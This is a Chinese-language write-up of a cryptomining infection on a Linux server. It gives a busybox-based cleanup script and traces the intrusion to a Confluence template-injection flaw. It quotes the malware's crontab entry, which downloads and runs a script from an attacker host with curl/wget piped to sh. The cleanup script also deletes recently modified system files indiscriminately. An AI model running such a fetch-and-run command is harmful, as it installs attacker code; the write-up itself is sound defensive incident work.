一、问题描述
7.17凌晨1点左右,突然接收到服务器报警CPU达到100%,负载飙高,TCP连接数明显突增,部分业务无法正常访问。
紧急登入服务器进行排查,top发现polkitds占用大量CPU,kill进程后,隔了几分钟CPU再次飙高,last,w等命令无法正常使用,怀疑受到病毒攻击,排查crontab时发现如下计划任务且删除无效,同时.bashrc也发现相同命令:
*/15 * * * * (curl -fsSL lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
查询发现lsd.systemten.org是一个挖矿网站,故确定中了挖矿病毒
二、处理方式
参考:https://blog.csdn.net/u010457406/article/details/89328869
切断服务器网络,前往busybox官网下载最新版安装包busybox-1.30.1.tar.bz2,安装过程如下:
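# Build a private copy of busybox so the cleanup does not depend on the host's
# (possibly hooked) coreutils. Verify the tarball's published checksum/signature
# before unpacking it — a compromised host is a bad place to trust a download.
# Abort if the directory is missing; the original ran make in whatever
# directory the shell happened to be in when cd failed.
cd busybox-1.30.1/ || exit 1
# NOTE(review): defconfig normally yields a dynamically linked busybox; if the
# preload library hooks libc, that copy is not immune. A static build
# (CONFIG_STATIC) is the safer choice — confirm in `make menuconfig`.
make defconfig
make
make install
# "$PWD" replaces the backtick substitution and is quoted so a build-tree path
# with spaces still works; the symlink is what puts busybox on PATH.
ln -s "$PWD/busybox" /usr/bin/busybox
# Sanity check: print the "BusyBox v<version>" banner line.
busybox | grep BusyBox | grep v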
编写busybox修复脚本
#!/bin/bash
#可以重复执行几次,防止互相拉起导致删除失败
function installBusyBox(){
  # Sanity check only: prints the banner line ("BusyBox v<version> ...") so the
  # operator can confirm the busybox binary built in step one is on PATH.
  busybox \
    | grep 'BusyBox' \
    | grep 'v'
}
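function banHosts(){
  # Cut the SSH spreading path: every credential file under /root/.ssh is
  # emptied. The originals are copied to a fresh mktemp directory first so the
  # attacker-planted authorized_keys entries survive as evidence and the host's
  # own key pair can be restored later (the original comment says recovery is
  # left to the operator; previously the data was simply gone).
  local backup f
  if backup=$(busybox mktemp -d /root/ssh-backup.XXXXXX); then
    busybox cp -p /root/.ssh/authorized_keys /root/.ssh/id_rsa \
      /root/.ssh/id_rsa.pub /root/.ssh/known_hosts /root/.ssh/auth \
      "$backup" 2>/dev/null
    printf 'ssh material copied to %s\n' "$backup" >&2
  fi
  # ': >' truncates to zero bytes; 'echo ""' left a one-byte newline behind.
  for f in authorized_keys id_rsa id_rsa.pub known_hosts auth; do
    : > "/root/.ssh/$f"
  done
  #iptables -I INPUT -p tcp --dport 445 -j DROP
  # Sinkhole the two hosts the original script blocks. Guarded so repeated
  # runs (the header says the script may be run several times) do not append
  # the same two lines to /etc/hosts again.
  if ! busybox grep -q 'pastebin.com' /etc/hosts; then
    busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts
  fi
}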
function fixCron(){
  # Wipe the cron entries the miner re-plants: clear any immutable bit, delete
  # the file, then leave an empty, immutable root crontab behind so it cannot
  # be rewritten before the reboot.
  # NOTE(review): removing /var/spool/cron/crontabs drops every per-user
  # crontab on systems that keep them there — confirm that is acceptable.
  local f
  for f in /etc/cron.d/root /var/spool/cron/root /var/spool/cron/tomcat \
           /var/spool/cron/crontabs/root; do
    busybox chattr -i "$f" 2>/dev/null
    busybox rm -f "$f"
  done
  busybox rm -rf /var/spool/cron/tmp.*
  busybox rm -rf /var/spool/cron/crontabs
  busybox touch /var/spool/cron/root
  busybox chattr +i /var/spool/cron/root
}
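function killProcess(){
  # Kill the miner's worker processes and remove their binaries.
  # The original `ps -ef | grep | awk '{print $1}' | sed s/root//` chain takes
  # column 1, which is the PID only in busybox's default ps layout; in
  # procps-style `-ef` output column 1 is the user name, the sed turns "root"
  # into an empty string and nothing is killed. pkill -f matches the full
  # command line directly and does not depend on column order. (pgrep/pkill
  # are busybox applets; confirm with `busybox --list` on a non-default build.)
  local name
  for name in kerberods khugepageds ksoftirqds kthrotlds kpsmouseds kintegrityds; do
    busybox pkill -9 -f "$name" 2>/dev/null
  done
  busybox rm -f /tmp/khugepageds
  busybox rm -f /usr/sbin/kerberods
  busybox rm -f /usr/sbin/kthrotlds
  busybox rm -f /usr/sbin/kintegrityds
  busybox rm -f /usr/sbin/kpsmouseds
  # Indiscriminate: every regular file under /tmp modified in the last 4 days
  # goes, malware or not. NUL-delimited so names with spaces are handled.
  busybox find /tmp -mtime -4 -type f -print0 | busybox xargs -0 busybox rm -rf
}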
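function clearLib(){
  # Undo the ld.so.preload hijack. Order matters: the original removed each
  # file before clearing its immutable bit (so the first rm failed silently and
  # a second rm further down was needed); here the bit is cleared first and
  # each path is handled once. Every deletion goes through busybox so a hooked
  # coreutils rm is not relied upon (the original find sweep used plain rm).
  local f dir
  for f in /etc/ld.so.preload /usr/local/lib/libcryptod.so \
           /usr/local/lib/libcset.so /usr/local/lib/libdevmapped.so \
           /usr/local/lib/libpamcd.so; do
    busybox chattr -i "$f" 2>/dev/null
    busybox rm -rf "$f"
  done
  # Indiscriminate sweep: every regular file under these library directories
  # modified in the last 4 days is deleted, including legitimate ones from a
  # recent package update. Review `busybox find DIR -mtime -4 -type f` output
  # before running this on a host that was patched recently.
  for dir in /usr/local/lib/ /lib/ /lib64/; do
    busybox find "$dir" -mtime -4 -type f -print0 | busybox xargs -0 busybox rm -rf
  done
  # Drop the cache and leave an empty, immutable preload file so the library
  # cannot be re-registered before the reboot; ldconfig rebuilds the cache.
  busybox rm -f /etc/ld.so.cache
  busybox touch /etc/ld.so.preload
  busybox chattr +i /etc/ld.so.preload
  ldconfig
}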
function clearInit(){
  # Remove the init scripts the miner installs for persistence. The
  # chkconfig/systemctl lines are kept commented out, as in the original.
  #chkconfig netdns off 2>/dev/null
  #chkconfig --del netdns 2>/dev/null
  #systemctl disable netdns 2>/dev/null
  local f
  for f in /etc/rc.d/init.d/kerberods /etc/init.d/netdns \
           /etc/rc.d/init.d/kthrotlds /etc/rc.d/init.d/kpsmouseds \
           /etc/rc.d/init.d/kintegrityds; do
    busybox rm -f "$f"
  done
  #chkconfig watchdogs off 2>/dev/null
  #chkconfig --del watchdogs 2>/dev/null
  #chkconfig --del kworker 2>/dev/null
  #chkconfig --del netdns 2>/dev/null
}
function recoverOk(){
  # Bring crond back up, give it a moment, then release the immutable bit that
  # fixCron put on the empty root crontab so the operator can edit it again.
  service crond start
  busybox sleep 3
  busybox chattr -i /var/spool/cron/root
  printf '%s\n' "OK,BETTER REBOOT YOUR DEVICE"
}
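# Fail early if the busybox built in step one is not on PATH: without it every
# `busybox ...` line above fails, yet the script would still reach
# `service crond start` with the infected crontab untouched.
if ! command -v busybox >/dev/null 2>&1; then
  printf 'busybox not found on PATH; build and link it first (see installBusyBox)\n' >&2
  exit 1
fi
# Stop cron first so it cannot re-plant the entries while they are removed.
service crond stop
# Block the SSH spread and the download hosts.
banHosts
# Remove the ld.so.preload hijack.
clearLib
# Rebuild the crontab.
fixCron
# Kill the workers; the lib and process passes are repeated because the
# components pull each other back up (see the header comment).
killProcess
clearLib
killProcess
# Remove the init-script persistence, then settle the crontab and restart cron.
clearInit
fixCron
recoverOk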
如果查杀不成功,重复进行多次查杀,尽量在短时间内完成所有操作并重启,防止病毒利用已加载的动态链接库恢复感染!!!
三、分析病毒来源
参考:https://www.freebuf.com/vuls/200477.html
通过查询发现confluence最近发布一个新的漏洞,Confluence Server与Confluence数据中心中的Widget连接器存在服务端模板注入漏洞,攻击者利用此漏洞能够实现目录穿越与远程代码执行。
涉及版本:6.6.7之前的所有版本的Confluence Server和Confluence数据中心;6.7.0起至6.8.5之前的版本(6.8.x系列的修复版本为6.8.5);6.9.0起至6.9.3之前的版本(6.9.x系列的修复版本为6.9.3)
服务器上安装了confluence-6.8.1,导致此次挖矿病毒入侵
四、安全加固
1.定期查看已安装的软件是否发布漏洞警告,及时升级版本或补丁
2.谨慎使用免密登录
3.禁止ROOT登录,在特殊需求下再开启